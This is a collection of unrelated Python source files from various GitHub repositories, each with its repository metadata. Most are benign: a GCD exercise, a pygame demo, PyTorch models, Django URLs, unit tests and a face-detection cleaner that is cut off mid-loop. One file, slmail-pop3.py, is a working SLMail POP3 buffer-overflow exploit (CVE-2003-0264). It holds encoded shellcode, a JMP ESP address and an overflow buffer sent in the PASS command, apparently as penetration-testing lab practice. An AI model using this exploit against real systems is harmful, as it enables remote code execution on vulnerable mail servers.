0ea44957c76a9923802c513c58e5213bc91b5f64
|
[
"MIT"
] |
permissive
|
Taewan-P/python_study
|
e2e68cc0f1467832dace22e27cc70d217560cf2c
|
f347e370aaa33aba5ab233252bcd759b94615348
|
refs/heads/master
| 2021-05-11T03:44:04.495186
| 2018-01-18T03:02:31
| 2018-01-18T03:02:31
| 117,923,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 548
|
py
|
def gcd1_2(m,n):
print("gcd1_2")
def loop(m, n, k):
print("gcd1_2, loop",m,n,k)
if not(m==0 or n==0):
if m%2==0 and n%2==0:
return loop(m//2,n//2,k*2) #오류 발생시 여기 확인!!(빈칸 있는 부분 k)
elif m%2==0 and n%2==1:
return loop(m//2,n,k)
elif m%2==1 and n%2==0:
return loop(m,n//2,k)
elif m<=n:
return loop(m,(n-m)//2,k)
else:
return loop(n,(m-n)//2,k)
else:
if m==0:
return abs(n*k)
else: #n==0
return abs(m*k)
return loop(m,n,1)
print(gcd1_2(18,48))
|
[
"swimtw@naver.com"
] |
swimtw@naver.com
|
dbce7481439b0de5401a7b81de4c4d300404aa6b
|
6388104b646b304a081985216ad2f82f09db2af3
|
/slmail-pop3.py
|
67f374a5ffac594a45f6cfba7a7c22230d03e945
|
[] |
no_license
|
war4uthor/CVE-2003-0264
|
73bd207d3f989434be942982d344285633f6fc48
|
82352386a3e740db37f84ebbaed2632965c4c0a8
|
refs/heads/master
| 2020-04-12T12:41:00.763220
| 2018-12-19T22:50:30
| 2018-12-19T22:50:30
| 162,499,093
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,955
|
py
|
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 5F4A358F FFE4 JMP ESP
shellcode = (
"\xb8\x9a\x26\x16\x98\xd9\xcd\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x83\xea\xfc\x31\x42\x0e\x03\xd8\x28\xf4\x6d\x20\xdc\x7a"
"\x8d\xd8\x1d\x1b\x07\x3d\x2c\x1b\x73\x36\x1f\xab\xf7\x1a\xac"
"\x40\x55\x8e\x27\x24\x72\xa1\x80\x83\xa4\x8c\x11\xbf\x95\x8f"
"\x91\xc2\xc9\x6f\xab\x0c\x1c\x6e\xec\x71\xed\x22\xa5\xfe\x40"
"\xd2\xc2\x4b\x59\x59\x98\x5a\xd9\xbe\x69\x5c\xc8\x11\xe1\x07"
"\xca\x90\x26\x3c\x43\x8a\x2b\x79\x1d\x21\x9f\xf5\x9c\xe3\xd1"
"\xf6\x33\xca\xdd\x04\x4d\x0b\xd9\xf6\x38\x65\x19\x8a\x3a\xb2"
"\x63\x50\xce\x20\xc3\x13\x68\x8c\xf5\xf0\xef\x47\xf9\xbd\x64"
"\x0f\x1e\x43\xa8\x24\x1a\xc8\x4f\xea\xaa\x8a\x6b\x2e\xf6\x49"
"\x15\x77\x52\x3f\x2a\x67\x3d\xe0\x8e\xec\xd0\xf5\xa2\xaf\xbc"
"\x3a\x8f\x4f\x3d\x55\x98\x3c\x0f\xfa\x32\xaa\x23\x73\x9d\x2d"
"\x43\xae\x59\xa1\xba\x51\x9a\xe8\x78\x05\xca\x82\xa9\x26\x81"
"\x52\x55\xf3\x06\x02\xf9\xac\xe6\xf2\xb9\x1c\x8f\x18\x36\x42"
"\xaf\x23\x9c\xeb\x5a\xde\x77\x1e\x90\xe0\xd7\x76\xa4\xe0\xd6"
"\x3d\x21\x06\xb2\x51\x64\x91\x2b\xcb\x2d\x69\xcd\x14\xf8\x14"
"\xcd\x9f\x0f\xe9\x80\x57\x65\xf9\x75\x98\x30\xa3\xd0\xa7\xee"
"\xcb\xbf\x3a\x75\x0b\xc9\x26\x22\x5c\x9e\x99\x3b\x08\x32\x83"
"\x95\x2e\xcf\x55\xdd\xea\x14\xa6\xe0\xf3\xd9\x92\xc6\xe3\x27"
"\x1a\x43\x57\xf8\x4d\x1d\x01\xbe\x27\xef\xfb\x68\x9b\xb9\x6b"
"\xec\xd7\x79\xed\xf1\x3d\x0c\x11\x43\xe8\x49\x2e\x6c\x7c\x5e"
"\x57\x90\x1c\xa1\x82\x10\x3c\x40\x06\x6d\xd5\xdd\xc3\xcc\xb8"
"\xdd\x3e\x12\xc5\x5d\xca\xeb\x32\x7d\xbf\xee\x7f\x39\x2c\x83"
"\x10\xac\x52\x30\x10\xe5")
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C"*(3500-2606-4-351-16)
try:
print "\nSending evil buffer..."
s.connect(('10.11.25.84', 110))
data = s.recv(1024)
s.send('USER username' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to POP3!"
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
574e6816db82fec92e4c415548263fb7ef3a52d2
|
ab149b8f1f20bf2212bead49fdf5bd6bf5330b89
|
/model/encoder.py
|
f5b18c46738890812e0f004126797488274a0a76
|
[
"MIT"
] |
permissive
|
wheeltune/kid-neuro
|
69ecf08717d82660cf0e6eccd406c0cad9f24f1e
|
131ec888e4f0c3ee1d7b4c4ebf57a6b1d5323d8a
|
refs/heads/main
| 2023-06-04T06:07:45.074418
| 2021-06-21T23:54:27
| 2021-06-21T23:54:27
| 375,545,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,559
|
py
|
import torch.nn as nn
from .norm_layer import NormLayer
__all__ = ["KeystrokesEncoder"]
#===============================================================================
class KeystrokesEncoder(nn.Module):
#---------------------------------------------------------------------------
def __init__(self, d_codes, d_hidden, n_layers, p_rnn_dropout=0.2, dropout=0.5):
super().__init__()
self.d_codes = d_codes
self.d_times = 4
self.d_model = self.d_codes + self.d_times
self.d_hidden = d_hidden
self.p_dropout = dropout
self.p_rnn_dropout = p_rnn_dropout
self.batch_norm_1 = NormLayer(self.d_model)
self.rnn_1 = nn.LSTM(
self.d_model,
self.d_hidden,
num_layers=n_layers,
dropout=self.p_rnn_dropout,
batch_first=True
)
self.batch_norm_2 = NormLayer(self.d_hidden)
self.dropout = nn.Dropout(self.p_dropout)
self.rnn_2 = nn.LSTM(
self.d_hidden,
self.d_hidden,
num_layers=n_layers,
dropout=self.p_rnn_dropout,
batch_first=True,
)
#---------------------------------------------------------------------------
def forward(self, x):
x = self.batch_norm_1(x)
x, _ = self.rnn_1(x)
x = self.batch_norm_2(x)
x = self.dropout(x)
_, (ht, _) = self.rnn_2(x)
x = ht[-1]
return x
#===============================================================================
|
[
"wheeltune@gmail.com"
] |
wheeltune@gmail.com
|
1c08ed7ab24404b2203e81b4ad894448a0dedbfd
|
efd4e7d85e2ae17853513e846ffce08288e3ff7b
|
/My_profile/urls.py
|
2abf6fd7317aee120b4a64f0256870f5a5802713
|
[] |
no_license
|
bodawalan/Django_blog
|
e033bbb5547f17b668f2a582f71700f4a1353184
|
43b9505708a18dbb9da28cad020f1ae90d5a0e0e
|
refs/heads/master
| 2021-01-19T11:29:42.448736
| 2017-04-12T20:06:21
| 2017-04-12T20:06:21
| 87,970,789
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 268
|
py
|
from django.conf.urls import url,include
from django.contrib import admin
from My_profile import views
urlpatterns = [
#url(r'^', views.Name_view),
url(r'^address', views.Address_view),
url(r'^contact', views.contact),
url(r'^', views.Name_view),
]
|
[
"nishit687539@gmail.com"
] |
nishit687539@gmail.com
|
523d338761f9c0eeceeea3dc1511eeec56a1d292
|
2cef2c608bde91a8e2deb4f88d62e164fce9a0e3
|
/4 - sprites and animations/Codebeispiele/first_sprite.py
|
493830ae10edf48a32b7a4e9df3906a845dee76f
|
[] |
no_license
|
mimuc/mmp-ss21
|
3be6c67e1951f673e5a28d1c1fd44fe2dfe4cb47
|
e20c5363b0ddf1866b7b7c044da7bb9a8330af20
|
refs/heads/master
| 2023-05-31T07:43:44.275815
| 2021-06-21T11:58:13
| 2021-06-21T11:58:13
| 355,538,628
| 5
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 652
|
py
|
import pygame
from pygame.locals import *
class Box(pygame.sprite.Sprite):
def __init__(self, color, initial_position):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface((20,20))
self.image.fill(color)
self.rect = self.image.get_rect()
self.rect.topleft = initial_position
def update(self):
pass
pygame.init()
screen = pygame.display.set_mode((640, 480), 0, 32)
box = Box((255,0,0),(0,0))
while True:
for event in pygame.event.get():
if event.type == QUIT:
exit()
screen.fill((0, 0, 0))
screen.blit(box.image,box.rect)
pygame.display.update()
|
[
"florian.bemmann@ifi.lmu.de"
] |
florian.bemmann@ifi.lmu.de
|
45ee8e725516dbf7e4470dd77fffccc3827108a8
|
98897a706b48f40ac34cf6d1722e086bd87043ff
|
/analysis_everglades/game_logic/test_battle.py
|
fa4026e51646220353ca57eb39ad74a07ab9862b
|
[] |
no_license
|
shaunhyp57/everglades
|
dae28fb1695443fb6bb0a1e7c81d50b320dba400
|
e4aab93d7fe8147ed3917605b2755ed429884b84
|
refs/heads/master
| 2022-04-25T03:07:24.999084
| 2020-04-27T16:32:12
| 2020-04-27T16:32:12
| 238,527,762
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,750
|
py
|
## Static Imports
import os
import importlib
import gym
import gym_everglades
import pdb
import numpy as np
from everglades_server import server
## Input Variables
# Agent files must include a class of the same name with a 'get_action' function
# Do not include './' in file path
agent0_file = 'agents/base_rushV1.py'
#agent1_file = 'agents/same_commands.py'
agent1_file = 'agents/random_actions.py'
config_dir = 'config/'
map_file = config_dir + 'DemoMap.json'
setup_file = config_dir + 'GameSetup.json'
unit_file = config_dir + 'UnitDefinitions.json'
output_dir = 'game_telemetry/'
debug = 1
## Specific Imports
agent0_name, agent0_extension = os.path.splitext(agent0_file)
agent0_mod = importlib.import_module(agent0_name.replace('/','.'))
agent0_class = getattr(agent0_mod, os.path.basename(agent0_name))
agent1_name, agent1_extension = os.path.splitext(agent1_file)
agent1_mod = importlib.import_module(agent1_name.replace('/','.'))
agent1_class = getattr(agent1_mod, os.path.basename(agent1_name))
## Main Script
env = gym.make('everglades-v0')
players = {}
names = {}
players[0] = agent0_class(env.num_actions_per_turn, 0)
names[0] = agent0_class.__name__
players[1] = agent1_class(env.num_actions_per_turn, 1)
names[1] = agent1_class.__name__
observations = env.reset(
players=players,
config_dir = config_dir,
map_file = map_file,
unit_file = unit_file,
output_dir = output_dir,
pnames = names,
debug = debug
)
actions = {}
## Game Loop
done = 0
while not done:
if debug:
env.game.debug_state()
for pid in players:
actions[pid] = players[pid].get_action( observations[pid] )
observations, reward, done, info = env.step(actions)
print(reward)
|
[
"shaunhyp57@knights.ucf.edu"
] |
shaunhyp57@knights.ucf.edu
|
c4ce2e6ba48d68bd21ff577fd3d57c7571c05689
|
50e6d7c4f7c3fe5127f4cc4634d6e9acdf8f5e17
|
/evaluate_cpu_only.py
|
cb4b463f79c79755652b1a74c1effe49460c817c
|
[
"MIT"
] |
permissive
|
Tiamat-Tech/gcn-cnn
|
907500a2cd4b42a1d5e43192b1b09956db02ccbd
|
6f9c685dd9ac9567746aa1904e549ecc00a7a712
|
refs/heads/master
| 2023-03-17T17:06:54.800458
| 2021-03-09T19:30:09
| 2021-03-09T19:30:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,552
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 20 11:01:07 2019
Compute the performance metrics for graphencoder model
performance metrics includes iou, pixelAccuracy
@author: dipu
"""
import torch
from torchvision import transforms
import torch.nn.functional as F
import pickle
from scipy.spatial.distance import cdist
import numpy as np
import init_paths
from dataloaders.dataloader_test_2 import *
from dataloaders.dataloader_test_2 import RICO_ComponentDataset
import models
import opts_dml
import os
from BoundingBox import BoundingBox
from BoundingBoxes import BoundingBoxes
from utils import mkdir_if_missing, load_checkpoint
from eval_metrics.get_overall_Classwise_IOU import get_overall_Classwise_IOU
from eval_metrics.get_overall_pix_acc import get_overall_pix_acc
def main():
opt = opts_dml.parse_opt()
os.environ["CUDA_VISIBLE_DEVICES"] = opt.gpu_id
onlyGallery = True
opt.use_directed_graph = True
opt.decoder_model = 'strided'
opt.dim =1024
boundingBoxes = getBoundingBoxes_from_info()
model_file = 'trained_models/model_dec_strided_dim1024_ep35.pth'
data_transform = transforms.Compose([ # Not used for 25Channel_images
transforms.Resize([255,127]),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
model = models.create(opt.decoder_model, opt)
#resume = load_checkpoint(model_file)
resume = torch.load(model_file, map_location=torch.device('cpu'))
model.load_state_dict(resume['state_dict'])
#model = model.cuda()
model.eval()
loader = RICO_ComponentDataset(opt, data_transform)
q_feat, q_fnames = extract_features(model, loader, split='query')
g_feat, g_fnames = extract_features(model, loader, split='gallery')
if not(onlyGallery):
t_feat, t_fnames = extract_features(model, loader, split='train')
g_feat = np.vstack((g_feat,t_feat))
g_fnames = g_fnames + t_fnames
q_feat = np.concatenate(q_feat)
g_feat = np.concatenate(g_feat)
distances = cdist(q_feat, g_feat, metric= 'euclidean')
sort_inds = np.argsort(distances)
overallMeanClassIou, _, _ = get_overall_Classwise_IOU(boundingBoxes,sort_inds,g_fnames,q_fnames, topk = [1,5,10])
overallMeanAvgPixAcc, _, _ = get_overall_pix_acc(boundingBoxes,sort_inds,g_fnames,q_fnames, topk = [1,5,10])
print('The overallMeanClassIou = ' + str([ '{:.3f}'.format(x) for x in overallMeanClassIou]) + '\n')
print('The overallMeanAvgPixAcc = ' + str([ '{:.3f}'.format(x) for x in overallMeanAvgPixAcc]) + '\n')
def extract_features(model, loader, split='gallery'):
epoch_done = False
feat = []
fnames = []
c=0
torch.set_grad_enabled(False)
while epoch_done == False:
c+=1
data = loader.get_batch(split)
sg_data = {key: torch.from_numpy(data['sg_data'][key]) for key in data['sg_data']}
x_enc, x_dec = model(sg_data)
x_enc = F.normalize(x_enc)
outputs = x_enc.detach().cpu().numpy()
feat.append(outputs)
fnames += [x['id'] for x in data['infos']]
if data['bounds']['wrapped']:
#print('Extracted features from {} images from {} split'.format(c, split))
epoch_done = True
print('Extracted features from {} images from {} split'.format(len(fnames), split))
return feat, fnames
# prepare bounding boxes information for RICO dataset
def getBoundingBoxes_from_info(info_file = 'data/rico_box_info.pkl'):
allBoundingBoxes = BoundingBoxes()
info = pickle.load(open(info_file, 'rb'))
#files = glob.glob(data_dir+ "*.json")
for imageName in info.keys():
count = info[imageName]['nComponent']
for i in range(count):
box = info[imageName]['xywh'][i]
bb = BoundingBox(
imageName,
info[imageName]['componentLabel'][i],
box[0],
box[1],
box[2],
box[3],
iconClass=info[imageName]['iconClass'],
textButtonClass=info[imageName]['textButtonClass'])
allBoundingBoxes.addBoundingBox(bb)
print('Collected {} bounding boxes from {} images'. format(allBoundingBoxes.count(), len(info) ))
# testBoundingBoxes(allBoundingBoxes)
return allBoundingBoxes
#%%
if __name__ == '__main__':
main()
|
[
"dips4717@gmail.com"
] |
dips4717@gmail.com
|
730e91b4e0c6f30bc58e9e97cc1c8d759cb3c311
|
3cc416df0c4697aa0f2dffb4d94e89f5cb62ec0e
|
/api/hypem/urls.py
|
baef22a54a09b3ed3a47056df93c2fb6c183a468
|
[] |
no_license
|
guess/hypem
|
308ed022839e603056467ac9bff36b33cef438a5
|
028aaec7007fdf9d0f593cac463b7a5cd91b36b1
|
refs/heads/master
| 2016-09-10T14:33:04.402081
| 2015-03-07T20:21:41
| 2015-03-07T20:21:41
| 31,442,249
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 227
|
py
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'^(\w+)/(\w+)/(\d+)', 'hypem.views.home', name='home'),
)
|
[
"stevetsourounis@gmail.com"
] |
stevetsourounis@gmail.com
|
9e1bdaa9a0888f3ccb9eba4f462b36b5688e2936
|
2bf1ffde9ed692e27c34d23b67babd95f8f5644d
|
/tests/test_naming.py
|
6fa54b180e6d20e00b54c2fda549cc654ac5e57b
|
[
"MIT"
] |
permissive
|
pvrk/python_backup
|
9dea3d657e619902aebbdcfc236b4eac9c302609
|
d61af53490c791bac1226062af7744a69b335ce9
|
refs/heads/master
| 2022-03-21T06:25:11.638414
| 2019-12-17T17:50:25
| 2019-12-17T17:50:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,233
|
py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------
"""Unit tests for Naming."""
import unittest
from asebackupcli.naming import Naming
class TestNaming(unittest.TestCase):
"""Unit tests for class Naming."""
def test_backup_type_str(self):
"""Test Naming.backup_type_str"""
self.assertEqual(
Naming.backup_type_str(is_full=True),
'full')
self.assertEqual(
Naming.backup_type_str(is_full=False),
'tran')
def test_type_str_is_full(self):
"""Test Naming.type_str_is_full"""
self.assertEqual(
Naming.type_str_is_full('full'),
True)
self.assertEqual(
Naming.type_str_is_full('tran'),
False)
def test_construct_filename(self):
"""Test Naming.construct_filename"""
self.assertEqual(
Naming.construct_filename(dbname="test1db", is_full=True,
start_timestamp="20180601_112429",
stripe_index=2, stripe_count=101),
'test1db_full_20180601_112429_S002-101.cdmp')
self.assertEqual(
Naming.construct_filename(dbname="test1db", is_full=False,
start_timestamp="20180601_112429",
stripe_index=2, stripe_count=101),
'test1db_tran_20180601_112429_S002-101.cdmp')
def test_construct_blobname_prefix(self):
"""Test Naming.construct_blobname_prefix"""
self.assertEqual(
Naming.construct_blobname_prefix(dbname="test1db", is_full=True),
'test1db_full_')
def test_construct_blobname(self):
"""Test Naming.construct_blobname"""
self.assertEqual(
Naming.construct_blobname(
dbname="test1db",
is_full=True,
start_timestamp="20180601_112429",
end_timestamp="20180601_131234",
stripe_index=2,
stripe_count=101),
'test1db_full_20180601_112429--20180601_131234_S002-101.cdmp')
def test_parse_ase_generated_filename(self):
"""Test Naming.parse_ase_generated_filename"""
self.assertEqual(
Naming.parse_ase_generated_filename('AZU_trans_20181205_091930_S01-11.cdmp'),
('AZU', '20181205_091930', 1, 11)
)
self.assertEqual(
Naming.parse_ase_generated_filename('AZU_tran_20181205_091930_S01-11.cdmp'),
None
)
def test_parse_filename(self):
"""Test Naming.parse_filename"""
self.assertEqual(
Naming.parse_filename('test1db_full_20180601_112429_S002-101.cdmp'),
('test1db', True, '20180601_112429', 2, 101))
self.assertEqual(
Naming.parse_filename('test1db_tran_20180601_112429_S02-08.cdmp'),
('test1db', False, '20180601_112429', 2, 8))
self.assertEqual(
Naming.parse_filename('bad_input') is None,
True)
def test_parse_blobname(self):
"""Test Naming.parse_blobname"""
self.assertEqual(
Naming.parse_blobname('test1db_full_20180601_112429--20180601_131234_S002-101.cdmp'),
('test1db', True, '20180601_112429', '20180601_131234', 2, 101)
)
self.assertEqual(
Naming.parse_blobname('test1db_tran_20180601_112429--20180601_131234_S2-008.cdmp'),
('test1db', False, '20180601_112429', '20180601_131234', 2, 8)
)
self.assertEqual(
Naming.parse_filename('bad_input'),
None
)
def test_pipe_names(self):
"""Test Naming.pipe_names"""
self.assertEqual(
Naming.pipe_names(dbname='AZU', is_full=True, stripe_count=3, output_dir='/tmp'),
[
'/tmp/backup_AZU_full_001_003.cdmp_pipe',
'/tmp/backup_AZU_full_002_003.cdmp_pipe',
'/tmp/backup_AZU_full_003_003.cdmp_pipe'
]
)
|
[
"chgeuer@microsoft.com"
] |
chgeuer@microsoft.com
|
b8f08a33fc0e8b8ddaecb9b9c29a5e20c4da5e32
|
047a9613723e6477e68624cb9c3aeb08bc1d4c8a
|
/src/_plotter.py
|
ab49aa83c46f2b322db46519f364eb23f4f35037
|
[
"MIT"
] |
permissive
|
phoenixding/cellar
|
512ca1c8fe580081b49ceadf7dfa81648739658d
|
4736b207e2b40a135f88cc2e677af620ea5ef20d
|
refs/heads/master
| 2023-02-22T05:42:30.902617
| 2021-01-31T16:39:20
| 2021-01-31T16:39:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,346
|
py
|
from typing import Optional, Union
import numpy as np
import plotly.express as px
from plotly.graph_objects import Figure
from anndata import AnnData
from .units import wrap
from . import reduce_dim_vis
from . import name_genes
COLORS = [
'#cc5151', '#51cccc', '#337f7f', '#8ecc51', '#7f3333', '#597f33', '#8e51cc',
'#59337f', '#ccad51', '#7f6c33', '#51cc70', '#337f46', '#5170cc', '#33467f',
'#cc51ad', '#7f336c', '#cc7f51', '#7f4f33', '#bccc51', '#757f33', '#60cc51',
'#3c7f33', '#51cc9e', '#337f62', '#519ecc', '#33627f', '#6051cc', '#3c337f'
]
def _find_gene_index(adata, gene):
if isinstance(gene, int):
if gene > adata.var.index.to_numpy().shape[0]:
raise ValueError("Index out of bounds.")
return gene
if not isinstance(gene, str):
raise ValueError("Incorrect gene format.")
if gene in adata.var.index.to_numpy():
return np.where(adata.var.index.to_numpy() == gene)[0]
if 'parsed_names' not in adata.var:
name_genes(adata)
if gene in adata.var['parsed_names'].to_numpy():
return np.where(adata.var['parsed_names'] == gene)[0]
if gene in adata.var['parsed_ids'].to_numpy():
return np.where(adata.var['parsed_ids'] == gene)[0]
return -1
def _plot_labels(
adata: AnnData,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> Figure:
"""
Helper function for plot.
"""
has_labels = True
if 'labels' not in adata.obs:
has_labels = False
print("Labels not found. Plotting 2d embeddings.")
#raise ValueError("Labels not found in object.")
if 'x_emb_2d' not in adata.obsm:
print("2d embeddings not found.")
print("Running default visualization method.")
reduce_dim_vis(adata)
if has_labels:
color = adata.obs['labels'].to_numpy().astype(str)
method = adata.uns['visualization_info_2d']['method']
fig = px.scatter(
x=adata.obsm['x_emb_2d'][:, 0],
y=adata.obsm['x_emb_2d'][:, 1],
color=color if has_labels else None,
hover_data={'Cell': adata.obs.index.to_numpy()},
labels={
'x': f'{method}1',
'y': f'{method}2'
},
title=adata.uns['dataset'] if show_title else None,
template='none'
)
if return_fig:
return fig
fig.show()
def _plot_gene(
adata: AnnData,
gene: Optional[Union[str, int]] = None,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> Figure:
"""
Helper function for plot.
"""
if gene is None:
raise ValueError("Please specify gene to plot.")
index = _find_gene_index(adata, gene)
if index == -1:
print("Gene not found.")
return
color = adata.X[:, index]
method = adata.uns['visualization_info_2d']['method']
fig = px.scatter(
x=adata.obsm['x_emb_2d'][:, 0],
y=adata.obsm['x_emb_2d'][:, 1],
color=color,
hover_data={'Cell': adata.obs.index.to_numpy()},
labels={
'x': f'{method}1',
'y': f'{method}2'
},
title=adata.uns['dataset'] if show_title else None,
template='none'
)
if return_fig:
return fig
fig.show()
def _plot_scores(
adata: AnnData,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> Figure:
"""
Helper function for plot.
"""
if 'scores' not in adata.uns['cluster_info']:
raise ValueError("Scores not found in object.")
eval_method = adata.uns['cluster_info']['eval_method']
fig = px.line(
x=adata.uns['cluster_info']['n_clusters_used'],
y=adata.uns['cluster_info']['scores'],
labels={
'x': 'n_clusters',
'y': f'{eval_method} score'
},
title=adata.uns['dataset'] if show_title else None,
template='none'
)
if return_fig:
return_fig
fig.show()
def plot(
x: AnnData,
by: Optional[str] = None,
gene: Optional[Union[str, int]] = None,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> None:
"""
Plotting functionality.
Parameters
__________
x: AnnData object containing the data matrix and the plot keys.
by: String specifying what to plot.
gene: Will be used only if by is None or by == 'gene'.
Specify the name of the gene for which to plot expression for.
Can be in ensembl format, gene name, or index. If name is
specified and names are not found in adata, then will run
name_genes, but will not save the names in the adata object.
show_title: Boolean specifying whether to show the name of the
dataset in the plot.
return_fig: Boolean specifying whether to return a fig object if
set to True, otherwise will plot immediately.
"""
# Validations
is_AnnData = isinstance(x, AnnData)
if not is_AnnData:
raise ValueError("Object not in AnnData format.")
if by == 'labels' or (by is None and gene is None):
return _plot_labels(x, show_title, return_fig)
elif by is None or by == 'gene':
return _plot_gene(x, gene, show_title, return_fig)
elif by == 'scores':
return _plot_scores(x, show_title, return_fig)
|
[
"euxhen_hasanaj@ymail.com"
] |
euxhen_hasanaj@ymail.com
|
99efab2a162ffa1089de10df2b63c489eb0dbd71
|
48c9af57aa1956d15b7335ea88dfbd44333c3998
|
/df_project_generate/__init__.py
|
d2d8463aa3df2da968f70d43fa907d725e4d6949
|
[] |
no_license
|
darfat/skp-jabar
|
eaf23685948fd6efd0604ef3a554b58a1cdd8bab
|
30861ae8eb1f37d1b3832043f297515f1a98b2e8
|
refs/heads/master
| 2021-01-22T13:12:16.658917
| 2014-10-06T09:11:54
| 2014-10-06T09:11:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 974
|
py
|
##############################################################################
#
# Darmawan Fatriananda
# BKD Pemprov Jabar
# Copyright (c) 2014 <http://www.asdarfat.wordpress.com.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
import wizard
|
[
"darmawan.jtk04@gmail.com"
] |
darmawan.jtk04@gmail.com
|
187daa4d61a1ac611a58cbcbda03db4114656f11
|
ea71a043e78c2fcbf1e9a39ff11eb39c699edd63
|
/core/views.py
|
4697547485e970b1daab5211e1a32ce427e7ff05
|
[] |
no_license
|
wellvsilva/djangoecommerce
|
fcce49c57def11480b66187ed0343a3b552f81ec
|
1bd9edcc5bd28f3a2721a489d389ef17efd343c7
|
refs/heads/master
| 2021-01-11T04:40:27.050588
| 2016-10-17T14:08:50
| 2016-10-17T14:08:50
| 71,141,786
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 307
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def index(request):
return render(request, 'index.html')
def contact(request):
return render(request, 'contact.html')
#def product_list(request):
# return render(request, 'product_list.html')
|
[
"wellvsilva.programador@gmail.com"
] |
wellvsilva.programador@gmail.com
|
e7df89bb363a64317c365f5f45a13d4c5a2e4096
|
a6c40c08da73bb1c65b48ce62ab6d035aa22fb41
|
/cleaner.py
|
bf4b23c67d8b90905f2535e876ce701dd078ceaa
|
[] |
no_license
|
SebasGarcia08/face-extractor
|
f279915a21fce2170f0b266378da10f7626c94a7
|
d999518b27a19b149b43be494ec68578c38ab033
|
refs/heads/master
| 2022-11-04T20:19:15.528249
| 2020-06-10T15:55:30
| 2020-06-10T15:55:30
| 269,957,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,456
|
py
|
from argparse import ArgumentParser
import insightface
import cv2
import os
import logging
import traceback
import shutil
from tqdm import tqdm, tqdm_gui
import time
import numpy as np
import tensorflow as tf
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
import multiprocessing
from multiprocessing import Pool
from p_tqdm import p_map
import sys
def main(args):
logging.info(' Reading files in {}'.format(args["INPUT_BASE_DIR"]))
if not args["save_in_same_output_folder"]:
copyDirectoryStructure(args["INPUT_BASE_DIR"], args["OUTPUT_PATH"])
else:
if os.path.exists(args["OUTPUT_PATH"]):
logging.error(" {} path already exists".format(args["OUTPUT_PATH"]))
return
else:
os.mkdir(args["OUTPUT_PATH"])
try:
if os.path.exists(args["INPUT_BASE_DIR"]):
num_imgs = 0
num_faces_detected = 0
num_images_filtered = 0
num_masked_faces_detected = 0
for dirpath, _, filenames in os.walk(args["INPUT_BASE_DIR"]):
for filename in filenames:
num_imgs += 1
pbar = tqdm(total=num_imgs, desc="Progress", unit="Images")
pbar.write(f"{num_imgs} images found")
for img_number, (dirpath, _, filenames) in enumerate(os.walk(args["INPUT_BASE_DIR"])):
for filename in filenames:
try:
partialPath = os.path.sep.join([ dirpath[ len(args["INPUT_BASE_DIR"]): ], filename ])
src = os.path.sep.join([args["INPUT_BASE_DIR"], partialPath])
img = cv2.imread(src)
img = cv2.resize(img, (255, 255))
bbox, _ = model.detect(img, threshold=0.5, scale=1.0)
if len(bbox) > 0:
num_images_filtered += 1
if args["save_in_same_output_folder"]:
out = os.path.sep.join([args["OUTPUT_PATH"], filename])
else:
out = os.path.sep.join([args["OUTPUT_PATH"], partialPath])
if args["keep_only_imgs_with_faces"]:
if args["move_images"]:
shutil.move(src, out)
else:
cv2.imwrite(out, img)
elif args["crop_faces"] or args["keep_only_imgs_with_masked_faces"]:
current_num_faces_detected = 0
faces = []
croppedImages = []
for box in bbox:
try:
if args["keep_only_imgs_with_masked_faces"]:
x,y,w,h,_ = list(map(int, box))
imgCrop = img[y:y+h,x:x+w]
croppedImages.append(imgCrop)
face = cv2.cvtColor(imgCrop, cv2.COLOR_BGR2RGB)
face = cv2.resize(face, (224, 224))
face = img_to_array(face)
face = preprocess_input(face)
face = np.expand_dims(face, axis=0)
faces.append(face)
except Exception as e:
# logging.error(traceback.format_exc())
pbar.write(traceback.format_exc())
saveImg = True
if len(faces) > 0:
preds = maskNet.predict(faces)
for i, (imgCrop, pred) in enumerate(zip(croppedImages, preds)):
out = out.replace(".jpg","")
out += f"face_No{str(i+1)}.jpg"
saveCroppedImg = True
